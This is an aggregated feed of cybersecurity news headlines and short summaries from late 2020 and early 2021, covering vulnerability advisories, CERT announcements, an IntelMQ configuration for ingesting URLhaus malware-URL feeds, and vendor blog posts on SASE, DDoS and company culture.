2021-01-20T12:25:02Z | 1611145502

In the second part of our article series on vulnerabilities we answer frequently asked questions. Have you ever wondered where you can report vulnerabilities you discover? Would you like to report a vulnerability but cannot find instructions on how to do it? You have heard that you could receive a reward for reporting a vulnerability, but how does the process work? We will explain what to do.

https://www.kyberturvallisuuskeskus.fi/en/news/vulnerabilities-how-report-them-correctly
Vulnerabilities – How to report them correctly?
2021-01-20T12:25:02Z | 1611145502

In the second part of our article series on vulnerabilities we answer frequently asked questions. Have you ever wondered where you can report vulnerabilities you discover? Would you like to report a vulnerability but cannot find instructions on how to do it? You have heard that you could receive a reward for reporting a vulnerability, but how does the process work? We will explain what to do.

https://www.kyberturvallisuuskeskus.fi/en/news/vulnerabilities-how-report-them-correctly
Digital and physical security meet at Fortum
2021-01-20T12:19:55Z | 1611145195

Leading cyber security requires comprehensive information on the physical and digital security threats associated with the business. A clear situation awarness of security is a key management tool, examining cyber security in terms of the past, present and future.

https://www.kyberturvallisuuskeskus.fi/en/news/digital-and-physical-security-meet-fortum
Digital and physical security meet at Fortum
2021-01-20T12:19:55Z | 1611145195

Leading cyber security requires comprehensive information on the physical and digital security threats associated with the business. A clear situation awarness of security is a key management tool, examining cyber security in terms of the past, present and future.

https://www.kyberturvallisuuskeskus.fi/en/news/digital-and-physical-security-meet-fortum
Games Drive Christmas Web Traffic
2021-01-20T05:00:00Z | 1611118800

If you turned on a new game console and/or downloaded video games over the holidays, you certainly weren't alone. New data from Akamai shows that game-related traffic delivered across our network was more than double the Q4 average on December 25, and up nearly 50% on December 26. During the same period, traffic for all other industries combined was relatively even compared to the rest of the quarter.

https://www.akamai.com/blog/performance/games-drive-christmas-web-traffic
A Place To Belong
2021-01-20T05:00:00Z | 1611118800

While I've worked for Silicon Valley-based startups and even spent time in the travel tech industry, I'd sometimes feel I was just part of the system. Working each day to earn my keep, and with no bigger purpose than that.

https://www.akamai.com/blog/culture/a-place-to-belong-by-sheng-thong-hsin
5 Surprising Cybersecurity Features of Guardicore Centra
2021-01-19T21:15:00Z | 1611090900

Check out these features around segmentation and visibility that can help working with Guardicore Centra even simpler.

https://www.akamai.com/blog/security/5-things-you-didnt-know-you-could-do-with-guardicore-centra
Guardicore Insight: Adding Best-in-Class Osquery Visibility to Secure Your Workloads
2021-01-19T15:59:00Z | 1611071940

What if you had a single solution that was able to detect non-compliant and high-risk endpoints and servers, assess their level of exposure, and then immediately secure these servers and endpoints with laser-sharp segmentation policies?

https://www.akamai.com/blog/security/guardicore-insight-adding-best-in-class-osquery-visibility-to-secure-your-workloads
Abuse.ch URLhaus is a new data feed for our notifications
2021-01-19T14:18:52Z | 1611065932

Since Wednesday January 13th, 2021 we are sending data of the URLhaus Feeds of the abuse.ch-project as part of our regular notifications to network owners. The feeds contain URLs to malware files of multiple malware families. To our knowledge, the feeds are of very high quality. Any feedback on the new data source, as well as our notifications in general is always welcome. How the feeds can be added to an IntelMQ instance is described in IntelMQ's feeds documentation. We added a few extra processing steps in our IntelMQ-setup due to a few internal requirements. As these configurations might be of interest to you, we will briefly describe our setup in the following section. We have two requirements which add some complexity: The feeds contains the "Dateadded" column, which refers to the first time the malware has been hosted at the given URL (added to the data as "time.source" by the parser). However, we want the "time.source" field to reflect an approximation of the most recent time the malware was still hosted on that URL. Since the data is updated periodically in sufficiently short time intervals, we can apply the following logic (in pseudocode): time.source = time.observation - 1 hour whereas the time.observation refers to the time the data has been fetched by IntelMQ. This results timestamps from when the malware hosting URL was definitely still active. We use both the Country-feed as well as the TLD-feed. As both feeds contain overlapping data, we need to deduplicate it. For the first requirement, two steps are needed as it is currently not possible to achieve this with a single IntelMQ bot. First, we use a modify expert with the following configuration: [ { "rulename": "set time.source to time.observation", "if": {}, "then": { "time.source": "{msg[time.observation]}" } } ] Then we use an additional sieve expert, with the following configuration: if :exists time.source { add! time.source -= '1 hour'} Mathematical operation on datetime objects will be supported in the upcoming IntelMQ release 2.3.0. To deduplicate the combined feeds of country code and TLD, we use the following parameters: filter_keys is set to raw,time.source,time.observation,feed.url filter_type is blacklist With a redis_cache_ttl slightly lower than one day: 82800 seconds Both feeds are collected once per day, initiated by systemd timers. We are using the scheduled run mode and the systemd service generator for this purpose. In summary, the order of bots is as following: Abuse.ch URLhaus Country Feed Collector and Abuse.ch URLhaus TLD Feed Collector Abuse.ch URLhaus Parser Modify Expert Sieve Expert Deduplicator Expert Further processing steps This blog post is part of a series of blog posts related to our CEF Telecom 2018-AT-IA-0111 project, which also supports our participation in the CSIRTs Network.

https://www.cert.at/en/blog/2021/1/abusech-urlhaus-new-data-feed-notifications
Advanced Ransomware Attacks
2021-01-19T09:32:31Z | 1611048751

In most cases, the vector of infection is either a malicious email that contains a malicious attachment or link, or an attack via an inadequately secured Remote Desktop Protocol. Nonetheless, cybercriminals can also exploit new vulnerabilities to gain unauthorised access to target networks. The post Advanced Ransomware Attacks appeared first on SI CERT.

https://www.cert.si/en/advanced-ransomware-attacks/
SD-WAN or SASE: The Power is in the Platform
2021-01-18T09:50:25Z | 1610963425

As enterprises set out to modernize their networks, SD-WAN has become a key networking technology for connecting offices. But with COVID-19, users transitioned to work at home, not in the office. What’s the alternative? Buy more VPN servers? That’s short-term thinking, and only effective until enterprises need to change again, and users move back to... The post SD-WAN or SASE: The Power is in the Platform appeared first on Cato Networks.

https://www.catonetworks.com/blog/sd-wan-or-sase-the-power-is-in-the-platform/
Já se encontram disponíveis os resultados do Inquérito Cibersegurança e Ensino a Distância
2021-01-18T00:00:00Z | 1610928000

Recorde-se que a pandemia de Covid-19 obrigou a uma rápida adaptação das Escolas ao ensino a distância, em particular a partir do dia 16 de março de 2020, situação que se manteve, pelo menos, até ao final do ano letivo de 2019/2020. Esta circunstância trouxe vários desafios de cibersegurança e mostrou a importância desta área para as necessidades de digitalização do ensino. O inquérito em causa foi respondido por cerca de 21 mil docentes e apresenta resultados muito relevantes para compreender as necessidades de cibersegurança das Escolas, quer para responder a situações como a que vivemos, quer para manter as atividades letivas seguras no futuro. Consulte os resultados do inquérito na íntegra aqui 

https://dyn.cncs.gov.pt/pt/detalhe/art/135530/ja-se-encontram-disponiveis-os-resultados-do-inquerito-ciberseguranca-e-ensino-a-distancia
The Ultimate SASE Checklist
2021-01-16T11:25:39Z | 1610796339

The post The Ultimate SASE Checklist appeared first on Cato Networks.

https://catonetworks.easywebinar.live/registration-44
Internalship Program
2021-01-13T05:00:00Z | 1610514000

In today's workplace, the landscape is a fast-paced, competitive environment, and today's employees are frequently on the hunt for growth opportunities.

https://www.akamai.com/blog/culture/internalship-program-by-kurian-thomas
High Threat Security Alert (A21-01-02): Multiple Vulnerabilities in Microsoft Products (January 2021)
2021-01-13T04:00:00Z | 1610510400

Microsoft has released security updates addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
2020. aasta viimane kvartal paistis silma rünnakutega Eesti riigi IT-taristu vastu
2021-01-12T13:42:43Z | 1610458963

Riigi infosüsteemi ameti (RIA) 2020. aasta neljanda kvartali küberruumi ülevaate põhiteema on edukas küberrünnak riigiasutustele, mis näitas, et küberruumis pole keegi lõpuni kaitstud.

https://ria.ee/uudised/2020-aasta-viimane-kvartal-paistis-silma-runnakutega-eesti-riigi-it-taristu-vastu
Emotet: A Year in the Life of a Malware
2021-01-12T05:00:00Z | 1610427600

Emotet malware has been around since 2014, but 2020 saw a resurgence of attacks. In September 2020, Emotet affected 14% of organizations worldwide. So, what is Emotet? And why is it so dangerous?

https://www.akamai.com/blog/security/emotet-a-year-in-the-life-of-a-malware
Preparing for Post-Intrusion Ransomware
2021-01-11T17:00:00Z | 1610384400

This evolving and brutally effective threat can have a significant impact on an organization’s resources, finances, and reputation, but it can be stopped

https://www.first.org/blog/20210111-Preparing_for_Post-Intrusion_Ransomware
Preparing for Post-Intrusion Ransomware
2021-01-11T17:00:00Z | 1610384400

This evolving and brutally effective threat can have a significant impact on an organization’s resources, finances, and reputation, but it can be stopped

https://www.first.org/blog/20210111-Preparing_for_Post-Intrusion_Ransomware
Types of Remote Access Technologies for Enterprises
2021-01-11T16:05:36Z | 1610381136

Long before the global pandemic made its way around the world, enterprises were already providing at least some of their workers the ability to work remotely. Whether it was salespeople on the road, or telecommuters working from home a few days per week, some small percentage of employees needed access to their corporate resources from... The post Types of Remote Access Technologies for Enterprises appeared first on Cato Networks.

https://www.catonetworks.com/blog/types-of-remote-access-technologies-for-enterprises/
Espionage attacks brought stormy cyber skies in November
2021-01-11T14:16:42Z | 1610374602

Cyber espionage attacks against the European Medicines Agency and cybersecurity company FireEye attracted attention and saw lightning storms sweep over November's cyber skies. Calmer weather came as the warning related to the Emotet malware strain was removed.

https://www.kyberturvallisuuskeskus.fi/en/kybersaa-marraskuu-2020
Espionage attacks brought stormy cyber skies in November
2021-01-11T14:16:42Z | 1610374602

Cyber espionage attacks against the European Medicines Agency and cybersecurity company FireEye attracted attention and saw lightning storms sweep over November's cyber skies. Calmer weather came as the warning related to the Emotet malware strain was removed.

https://www.kyberturvallisuuskeskus.fi/en/kybersaa-marraskuu-2020
FreyrSCADA IEC-60879-5-104 server simulator traffic logging denial-of-service vulnerability
2021-01-11T00:00:00Z | 1610323200

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1174
SonicWall NetExtender windows client unquoted service path vulnerability
2021-01-09T00:18:14Z | 1610151494

SonicWall NetExtender Windows client vulnerable to unquoted service path vulnerability, this allows a local attacker to gain elevated privileges in the host operating system. This vulnerability impact SonicWall NetExtender Windows client version 10.2.300 and earlier. CVE: CVE-2020-5147 Last updated: Jan. 9, 2021, 12:18 a.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2020-0023
SonicWall SSLVPN SMA100 authenticated command injection vulnerability
2021-01-09T00:18:14Z | 1610151494

A vulnerability in the SonicWall SMA100 appliance allows an authenticated management-user to perform OS command injection using HTTP POST parameters. This vulnerability affected SMA100 build version 10.2.0.2-20sv and earlier. CVE: CVE-2020-5146 Last updated: Jan. 9, 2021, 12:18 a.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2020-0022
Building a Cross Team Culture
2021-01-08T05:00:00Z | 1610082000

At Akamai, we all contribute to our diverse, inclusive, and engaged culture. One in which we each have a voice and are empowered to have a meaningful impact on our business and its direction. It's by fostering this culture across teams that we're able to achieve the company's guiding principles. For all of us, it means putting our clients, employees and communities front and center in our daily work.

https://www.akamai.com/blog/culture/building-a-cross-team-culture-by-rick-mcconnell
Security Alert (A21-01-01): Vulnerability in Firefox
2021-01-07T04:00:00Z | 1609992000

Mozilla has published a security advisory (MFSA 2021-01) to address a vulnerability in Firefox browser.

https://www.govcert.gov.hk/en/alerts_detail.php
Rockwell Automation RSLinx classic ethernet/IP server denial-of-service vulnerability
2021-01-07T00:00:00Z | 1609977600

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1184
Amnesia 33 vulnerabilities
2021-01-06T21:25:16Z | 1609968316

Amnesia 33 vulnerabilities impacts four open source TCP/IP stacks (uIP, FNET, picoTCP and Nut/Net) libraries which are used in millions of smart IOT and embedded devices. These four open source TCP/IP stacks libraries are not used in the SonicWall firewall products. CVE: N/A Last updated: Jan. 6, 2021, 9:25 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2020-0025
Cato Engineers Review Favorite SASE Features
2021-01-05T08:59:11Z | 1609837151

At Cato, we pride ourselves not only on the performance and airtight security of the Cato platform but the power and ease of use of its management tools. Cato’s cloud-based interface puts a lot of granular configuration power in the hands of the customers, rather than forcing them to wait hours or days for the... The post Cato Engineers Review Favorite SASE Features appeared first on Cato Networks.

https://www.catonetworks.com/blog/cato-engineers-review-favorite-sase-features/
Keeping Emissions in Check During Unprecedented Internet Use
2021-01-05T05:00:00Z | 1609822800

As I reflect on 2020 and the way in which the pandemic affected the business world, what stands out to me is the incredible increase in streaming content consumed on the internet. We've seen launches of some of the highest-profile streaming services to date between late 2019 and 2020. People are continuously streaming content and we need to consider the impact that increased viewership is having on the world. When you sit down to catch a movie or binge watch that latest series, do you consider the effect that streamed content has on the rest of the world? We will continue to see an uptick in carbon emissions from the power required to serve online content: servers, network hardware, and the energy needed to keep it all cool.

https://www.akamai.com/blog/news/keeping-emissions-in-check-during-unprecedented-internet-use
Tree-Tracker: Auditing a Log Harvest Using IoT Edge Connect and Node-Red
2021-01-05T05:00:00Z | 1609822800

At long last, Blue Water Farm is generating revenue! Around 20 acres of our land consists of dense, mature hardwood of oak, maple, and beech, and we were able to contract to sell 65 maple and 25 oak trees to a logging company. I won't be retiring from Akamai any time soon from our logging windfall, but it's nice to see some revenue from our land, and clearing mature trees is a part of good responsible forest management.

https://www.akamai.com/blog/edge/tree-tracker-auditing-a-log-harvest-using-iot-edge-connect-and-node-red
Genivia gSOAP WS-Addressing plugin denial-of-service vulnerability
2021-01-05T00:00:00Z | 1609804800

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1186
SoftMaker Office TextMaker Document Record 0x002a integer overflow vulnerability
2021-01-05T00:00:00Z | 1609804800

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1163
Genivia gSOAP WS-Security plugin denial-of-service vulnerability
2021-01-05T00:00:00Z | 1609804800

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1188
SoftMaker Office TextMaker Document Record 0x003f integer conversion vulnerability
2021-01-05T00:00:00Z | 1609804800

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1162
Genivia gSOAP WS-Security plugin denial-of-service vulnerability
2021-01-05T00:00:00Z | 1609804800

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1189
Genivia gSOAP WS-Addressing plugin code execution vulnerability
2021-01-05T00:00:00Z | 1609804800

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1187
Genivia gSOAP WS-Security plugin denial-of-service vulnerability
2021-01-05T00:00:00Z | 1609804800

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1185
SoftMaker Office TextMaker Document Record 0x001f sign-extension vulnerability
2021-01-05T00:00:00Z | 1609804800

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1161
CVE-2020-27267
2021-01-05T00:00:00Z | 1609804800

USE AFTER FREE CWE-416 The affected products are vulnerable to a use after free vulnerability, which may allow an attacker to create and close OPC UA connections at a high rate that may cause a server to crash. Read more: Claroty Finds Critical Flaws in OPC Protocol Implementations

https://claroty.com/team82/disclosure-dashboard/cve-2020-27267
CVE-2020-27263
2021-01-05T00:00:00Z | 1609804800

HEAP-BASED BUFFER OVERFLOW CWE-122 The affected products are vulnerable to a heap-based buffer overflow. Opening a specifically crafted OPC UA message could allow an attacker to crash the server and potentially leak data. Read more: Claroty Finds Critical Flaws in OPC Protocol Implementations

https://claroty.com/team82/disclosure-dashboard/cve-2020-27263
Using similarity to expand context and map out threat campaigns
2021-01-04T17:00:00Z | 1609779600

Cyber Threat Intelligence (CTI) practitioners can gain insight into adversary operations by tracking conflicts or geopolitical tensions. Similar to a “follow the money” approach in criminal investigations, looking at conflict zones can reveal cyber capabilities deployed as part of events —either by the parties to the conflict itself, or third parties interested in monitoring events for their own purposes.

https://www.first.org/blog/20210104-Using_similarity_to_expand_context_and_map_out_threat_campaigns
Using similarity to expand context and map out threat campaigns
2021-01-04T17:00:00Z | 1609779600

Cyber Threat Intelligence (CTI) practitioners can gain insight into adversary operations by tracking conflicts or geopolitical tensions. Similar to a “follow the money” approach in criminal investigations, looking at conflict zones can reveal cyber capabilities deployed as part of events —either by the parties to the conflict itself, or third parties interested in monitoring events for their own purposes.

https://www.first.org/blog/20210104-Using_similarity_to_expand_context_and_map_out_threat_campaigns
The Benefits of Secure Access Service Edge
2021-01-04T13:11:00Z | 1609765860

The post The Benefits of Secure Access Service Edge appeared first on Cato Networks.

https://www.catonetworks.com/resources/sase-secure-access-service-edge-by-cato-networks/
Win-911 mobile server platform privilege escalation vulnerability
2021-01-04T00:00:00Z | 1609718400

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1151
Win-911 Enterprise Platform privilege escalation vulnerability
2021-01-04T00:00:00Z | 1609718400

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1150
Four MITRE Shield Techniques You Can Implement in 2021
2020-12-30T16:48:39Z | 1609346919

For free, of course. At this point, I’m positive that you’ve heard of MITRE Shield. It’s a new active defense knowledge base released by MITRE – stuff they’ve been implementing for over a decade to engage adversaries and derail attacks. They’ve opened it up to everyone, and for the first time perhaps, the infosec community […]

https://www.smokescreen.io/four-mitre-shield-techniques-you-can-implement-in-2021/
SASE – The Strategic Difference Is in the Middle
2020-12-30T09:20:52Z | 1609320052

SASE (Secure Access Service Edge) is the new, shiny toy of networking and security providers. Defined in 2019 by Gartner, SASE is a new, converged, cloud-native, elastic, and global architecture that will dominate the way enterprises deliver a broad set of networking and security capabilities. Since then, SASE messaging has been adopted by most vendors... The post SASE – The Strategic Difference Is in the Middle appeared first on Cato Networks.

https://www.catonetworks.com/blog/sase-the-strategic-difference-is-in-the-middle/
Akamai's Technical Enablement and Education Team, Part of the Global Services and Support Organization, Wins 2020 Chief Learning Officer Magazine Gold Award
2020-12-30T05:00:00Z | 1609304400

On October 2020, the Akamai Technical Enablement and Education (TE&E) Team -- responsible for creating product-training certifications for employees (Global Services and Support [GSS]), customers (Akamai University), and channel partners (Advanced Partner Enablement) -- won its second industry award for program design, functionality, and impact.

https://www.akamai.com/blog/news/akamais-technical-enablement-and-education-team-part-of-the-global-services-and-support-organization-1
Akamai Prolexic and Equinix Cloud Exchange Bring DDoS Defense Closer to the Origin
2020-12-29T05:00:00Z | 1609218000

In terms of cyberthreats and digital risk, 2020 has been all about distributed denial-of-service (DDoS) attacks.

https://www.akamai.com/blog/security/akamai-prolexic-and-equinix-cloud-exchange-unite-bringing-ddos-defense-closer-to-the-customer-origin
Active Defense – Incident Response’s New Best Friend
2020-12-29T01:34:46Z | 1609205686

Active defense provides defenders with a shared vocabulary and framework for actively dealing with threats instead of passively reacting to them.

https://www.smokescreen.io/active-defense-for-incident-responders/
The Best Networking Memes of 2020
2020-12-28T09:16:51Z | 1609147011

Throughout the year, Catoians gather and share memes internally about a host of topics. This year, we developed a very unscientific algorithm for ranking those memes and sharing the very best. Big thanks to Cato’s Daniel Avron, Jerry Young, Oded Engel, and Oren David for their scouring the Internet efforts. And without further ado… #10... The post The Best Networking Memes of 2020 appeared first on Cato Networks.

https://www.catonetworks.com/blog/the-best-networking-memes-of-2020/
Smart DNS: Emerging Requirements for DNS Encryption
2020-12-28T05:00:00Z | 1609131600

This blog post -- the fourth in a series -- will discuss how smart DNS resolvers can enhance ongoing ISP and MNO network transformation efforts, such as the transition to 5G, better integration of Wi-Fi, and new network designs that optimize the edge to improve service delivery and network efficiency.

https://www.akamai.com/blog/edge/smart-dns-for-the-new-network-edge-emerging-requirements-for-dns-encryption
What to Consider Before Renewing your SD-WAN Contract or Service
2020-12-24T16:15:56Z | 1608826556

The post What to Consider Before Renewing your SD-WAN Contract or Service appeared first on Cato Networks.

https://www.catonetworks.com/resources/if-your-sd-wan-is-up-for-renewal-sase-is-a-powerful-alternative/
Research & Academic
2020-12-23T14:00:00Z | 1608732000

We introduce a novel machine learning approach that uses network flows to generate application-level representation of public and private cloud networks. This will greatly simplify the journey to a micro-segmented network.

https://www.akamai.com/blog/security/research-academic
Launching a New Game Studio and Planning for Growth
2020-12-23T05:00:00Z | 1608699600

So, you're starting your own game studio. This is an incredible opportunity! You and your team get to start fresh and build the game of your dreams! But, let's be honest, if you have just founded your own game studio, odds are that you're not a technical architect. You may have some technical know-how, but studio founders typically come from the creative side.

https://www.akamai.com/blog/performance/launching-a-new-game-studio-and-planning-for-growth
How the Edge Improves Microservices
2020-12-22T05:00:00Z | 1608613200

Microservice architecture has transformed the way we develop and operate our applications. Microservices aren't a technology or a programming language. Instead, they create a structure for designing and building applications based on the idea that the individual functions of a website should operate independently. From this simple concept comes a multitude of benefits including:

https://www.akamai.com/blog/edge/how-the-edge-improves-microservices
Forecasting: All for One and One for All in Cybersecurity
2020-12-21T17:00:00Z | 1608570000

https://www.first.org/blog/20201221-Forecasting_All_for_One_and_One_for_All_in_Cybersecurity
Forecasting: All for One and One for All in Cybersecurity
2020-12-21T17:00:00Z | 1608570000

https://www.first.org/blog/20201221-Forecasting_All_for_One_and_One_for_All_in_Cybersecurity
Sunburst: How Will You Protect Yourself from the Next Attack?
2020-12-21T14:59:21Z | 1608562761

On December 8, FireEye reported that it had been compromised by a highly sophisticated state-sponsored adversary, which stole many tools used by FireEye red-team, the team that plays the role of an attacker in penetration testing. Upon investigation, on December 13, FireEye and Microsoft published a technical report, pointing out that the adversary gained access... The post Sunburst: How Will You Protect Yourself from the Next Attack? appeared first on Cato Networks.

https://www.catonetworks.com/blog/sunburst-how-will-you-protect-yourself-from-the-next-attack/
Stopping Sunburst: The Second-Best Argument for a SASE Platform
2020-12-21T14:28:48Z | 1608560928

It’s likely been the most sophisticated publicized attack in the past decade. For more than nine months, Sunburst, the trojan designed for SolarWinds Orion, lurked undetected in enterprise networks. Some 18,000 SolarWinds customers may have downloaded the trojanized Orion software, and not one reported the threat. (To better understand why this threat went undetected, check... The post Stopping Sunburst: The Second-Best Argument for a SASE Platform appeared first on Cato Networks.

https://www.catonetworks.com/blog/stopping-sunburst-the-second-best-argument-for-a-sase-platform/
Demonstrating Easy Management for True SASE
2020-12-21T09:25:09Z | 1608542709

The post Demonstrating Easy Management for True SASE appeared first on Cato Networks.

https://catonetworks.easywebinar.live/registration-43
FIRST POST: December 2020
2020-12-21T00:00:00Z | 1608508800

Over 2500 Cybersecurity Professionals Participate In 32nd FIRST Annual Conference - Where Defenders Share. 2021 33rd Annual Conference Theme And Call For Papers. 2020 FIRST Virtual Symposium For Africa And The Arab Region - Supporting The Effectiveness Of Incident Response Within Africa. Ian Cook And Don Stikvoort Receive Joint Honors In The Incident Response Hall Of Fame Awards. New Code Of Ethics Launched On Global Ethics Day. FIRST Partners With Itu And Equals Global Partnership To Empower Women In Cybersecurity. FIRST To Contribute To Itu National Cybersecurity Strategy Guide. Mou Signed Between First And Ocf To Advance Membership Of Incident Responders And Security Teams Across The Globe. Reminder - 2021 First Membership Renewal.

https://www.first.org/newsroom/newsletters/FIRST_Dec2020.pdf
Microsoft Azure Sphere networkd mdns denial-of-service vulnerability
2020-12-18T00:00:00Z | 1608249600

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1141
Smart DNS for the New Network: Optimizing Content Delivery
2020-12-17T05:00:00Z | 1608181200

The presence of public "over the top" DNS resolution alternatives is a strong motivator for ISPs to invest in making their DNS resolution infrastructure the best that it can be. Resolvers are the glue that binds subscribers to their fixed and mobile broadband services. Operators of public DNS services will play a significant role in controlling the user experience and gain goodwill if they succeed in persuading subscribers to use their resolvers. Worse, when public DNS services fail, it's probable that subscribers will blame their service provider because they may not understand the critical role DNS plays, or may not even remember they switched their DNS settings!

https://www.akamai.com/blog/security/smart-dns-for-the-new-network-optimizing-content-delivery
CVE-2020-27265
2020-12-17T00:00:00Z | 1608163200

STACK-BASED BUFFER OVERFLOW CWE-121 The affected products are vulnerable to a stack-based buffer overflow. Opening a specifically crafted OPC UA message could allow an attacker to crash the server and remotely execute code. Read more: Claroty Finds Critical Flaws in OPC Protocol Implementations

https://claroty.com/team82/disclosure-dashboard/cve-2020-27265cve-2020-27263cve-2020-27267
CVE-2020-12522
2020-12-17T00:00:00Z | 1608163200

IMPROPER NEUTRALIZATION OF SPECIAL ELEMENTS USED IN OS COMMAND CWE78A command injection vulnerability in WAGO I/O-Check service, which allows an attacker with network access to the PFC device to remotely execute code with specially crafted packets.Read more: Claroty Uncovers RCE Vulnerability in WAGO Controller Firmware

https://claroty.com/team82/disclosure-dashboard/cve-2020-12522
Breaking Aave Upgradeability
2020-12-16T16:01:55Z | 1608134515

On December 3rd, Aave deployed version 2 of their codebase. While we were not hired to look at the code, we briefly reviewed it the following day. We quickly discovered a vulnerability that affected versions 1 and 2 of the live contracts and reported the issue. Within an hour of sending our analysis to Aave, […]

https://blog.trailofbits.com/2020/12/16/breaking-aave-upgradeability/
NCSC supports US advisory regarding GRU intrusion set Sandworm
2020-12-16T15:23:46Z | 1608132226

The US National Security Agency has today published an advisory regarding the GRU - the Russian military intelligence service.

https://www.ncsc.gov.uk/news/ncsc-supports-sandworm-advisory
Cato Demo: How a SASE with a private backbone optimizes access to cloud applications
2020-12-16T10:51:51Z | 1608115911

The post Cato Demo: How a SASE with a private backbone optimizes access to cloud applications appeared first on Cato Networks.

https://www.catonetworks.com/resources/cato-demo-how-a-sase-with-a-private-backbone-optimizes-access-to-cloud-applications/
Cato Demo: How to configure and monitor ZTNA (Zero Trust Network Access) in minutes
2020-12-16T09:19:39Z | 1608110379

The post Cato Demo: How to configure and monitor ZTNA (Zero Trust Network Access) in minutes appeared first on Cato Networks.

https://www.catonetworks.com/resources/cato-demo-how-to-configure-and-monitor-ztna-zero-trust-network-access-in-minutes/
RIS infokiri – detsember 2020
2020-12-16T07:24:13Z | 1608103453

Infokirjas on juttu #Bürokrati juturobotist, riigi autentimisteenusest, sündmusteenustest, uuenenud Your Europe portaalist, riigi parimate digiteenuste konkursist, artiklivaramust, taakvarast ning nõusolekuteenusest.

https://ria.ee/uudised/ris-infokiri-detsember-2020
Security Alert (A20-12-06): Multiple Vulnerabilities in Firefox
2020-12-16T04:00:00Z | 1608091200

Mozilla has published two security advisories (MFSA 2020-54 and MFSA 2020-55) to address multiple vulnerabilities in Firefox browser.

https://www.govcert.gov.hk/en/alerts_detail.php
NZXT CAM WinRing0x64 driver IRP 0x9c402088 privilege escalation vulnerability
2020-12-16T00:00:00Z | 1608076800

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1116
Kepware LinkMaster Service privilege escalation vulnerability
2020-12-16T00:00:00Z | 1608076800

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1147
NZXT CAM WinRing0x64 driver IRP 0x9c406144 information disclosure vulnerability
2020-12-16T00:00:00Z | 1608076800

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1113
Lantronix XPort EDGE Web Manager CSRF vulnerability
2020-12-16T00:00:00Z | 1608076800

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1135
NZXT CAM WinRing0x64 driver IRP 0x9c402084 information disclosure vulnerability
2020-12-16T00:00:00Z | 1608076800

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1115
NZXT CAM WinRing0x64 Driver Privileged I/O Write IRPs Privilege Escalation Vulnerability
2020-12-16T00:00:00Z | 1608076800

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1111
Lantronix XPort EDGE Web Manager and telnet CLI cleartext transmission of sensitive information vulnerability
2020-12-16T00:00:00Z | 1608076800

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1136
NZXT CAM WinRing0x64 driver IRP 0x9c40a148 privilege escalation vulnerability
2020-12-16T00:00:00Z | 1608076800

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1112
NZXT CAM WinRing0x64 driver privileged I/O read IRPs information disclosure vulnerability
2020-12-16T00:00:00Z | 1608076800

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1110
NZXT CAM WinRing0x64 Driver IRP 0x9c406104 information disclosure vulnerability
2020-12-16T00:00:00Z | 1608076800

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1114
Hacking Chess.com and Accessing 50 Million Customer Records
2020-12-16T00:00:00Z | 1608076800

Jackpot, full arbitrary account takeover of any chess.com user!

https://samcurry.net/hacking-chesscom
NAT Slipstreaming (CVE-2020-28041)
2020-12-15T21:41:20Z | 1608068480

SonicWall Firewalls are not vulnerable to the NAT Slipstreaming attack.SonicWall Firewall does not open an alternative port set in the SIP packet header, results in an invalid connection, and packets are dropped. CVE: CVE-2020-28041 Last updated: Dec. 15, 2020, 9:41 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2020-0024
Stopping Active Attacks with Penalty Box
2020-12-15T19:26:00Z | 1608060360

Unfortunately, today's sophisticated web application threats have gained some advantages over typical WAFs: Favorable odds -- WAFs must correctly identify attacks 100% of the time, whereas attackers have the luxury of only needing to find a single bypass or evasion Temporary fixes -- Many WAFs use a "whack-a-mole" response tactic by only denying the individual attack request, allowing the attacker to make repeated attempts Persistence -- If left unimpeded, attackers may eventually find some type of payload obfuscation that minimizes detection effectiveness The confluence of these advantages should concern WAF customers. Let's take a closer look at the typical web attacker methodology to see why.

https://www.akamai.com/blog/security/penalty-box
2020. aasta november Eesti küberruumis: rünnakud riigiametite võrkude vastu ja DDoS ründed väljapressimise eesmärgil
2020-12-15T09:06:08Z | 1608023168

Novembrikuu kõige tõsisemad küberintsidendid olid ründed Eesti riigiametite võrkude vastu ning kurjategijad pääsesid teatud ulatuses ligi kolme ministeeriumi serveritele. Möödunud kuul anti RIA-le teada ka teenustõkestusrünnakutest (DDoS), millega prooviti ettevõtetelt ja finantsasutustelt raha välja pressida.

https://ria.ee/uudised/2020-aasta-november-eesti-kuberruumis-runnakud-riigiametite-vorkude-vastu-ja-ddos-runded
Security Alert (A20-12-04): Multiple Vulnerabilities in Apple iOS and iPadOS
2020-12-15T04:00:00Z | 1608004800

Apple has released iOS 14.3 and iPadOS 14.3 as well as iOS 12.5 to fix multiple vulnerabilities in various Apple devices.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A20-12-05): Vulnerability in SolarWinds Orion Platform software
2020-12-15T04:00:00Z | 1608004800

SolarWinds has released a security advisory warning customers about a supply chain attack on SolarWinds Orion Platform software.

https://www.govcert.gov.hk/en/alerts_detail.php
Current Events to Widespread Campaigns: Pivoting from Samples to Identify Activity
2020-12-14T17:00:00Z | 1607965200

